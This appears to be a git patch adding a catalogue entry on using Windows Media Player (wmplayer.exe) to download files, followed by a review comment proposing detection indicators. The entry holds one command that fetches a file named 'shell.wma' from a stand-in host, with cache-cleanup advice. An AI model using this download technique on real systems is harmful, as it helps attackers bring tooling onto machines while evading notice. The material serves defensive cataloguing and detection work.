From f8e6e4755fc607819d04cc755b38215b368ffdf1 Mon Sep 17 00:00:00 2001 From: pampuna <2449718+pampuna@users.noreply.github.com> Date: Sat, 14 Dec 2024 12:15:46 +0000 Subject: [PATCH] Added technique using wmplayer.exe --- yml/OSBinaries/Wmplayer.yml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 yml/OSBinaries/Wmplayer.yml diff --git a/yml/OSBinaries/Wmplayer.yml b/yml/OSBinaries/Wmplayer.yml new file mode 100644 index 0000000..8be81e7 --- /dev/null +++ b/yml/OSBinaries/Wmplayer.yml @@ -0,0 +1,26 @@ +--- +Name: Wmplayer.exe +Description: Windows Media Player +Author: 'Rutger Flohil' +Created: 2024-12-14 +Commands: + - Command: & "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" "http://example.com/shell.wma" + Description: Windows Media Player will download the file and attempt to play it. File should be encoded and have a compatible extension like wma. Download is stored in INetCache and needs to be cleaned before use. + Usecase: Download file from the internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 + Tags: + - Download: INetCache +Full_Path: + - Path: C:\Program Files\Windows Media Player\wmplayer.exe + - Path: C:\Program Files (x86)\Windows Media Player\wmplayer.exe +Code_Sample: + - Code: https://pampuna.nl/blog/2024/12/wmplayer.html +Detection: + - IOC: Network connections originating from wmplayer.exe may be suspicious +Resources: + - Link: https://pampuna.nl/blog/2024/12/wmplayer.html + - Person: Rutger Flohil + Handle: '' \ No newline at end of file
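Review bot: the Detection entry gives defenders little to pivot on: "Network connections originating from wmplayer.exe may be suspicious" names only the process, while the Description in the same hunk already states the concrete artefacts (a URL passed on the command line and a download written to INetCache). Consider adding IOC lines that match those, for example `- IOC: wmplayer.exe launched with an http/https URL as its argument` and `- IOC: File writes by wmplayer.exe into the INetCache directory`, so the entry is actionable for hunting and not just a caveat. Two smaller points in the same hunk: the Command hardcodes the `Program Files (x86)` path while Full_Path lists both the native and x86 locations, so either confirm the 64-bit binary behaves the same or state which one was tested; and `Handle: ''` is left empty and the file ends without a trailing newline (`\ No newline at end of file`), both worth tidying before merge.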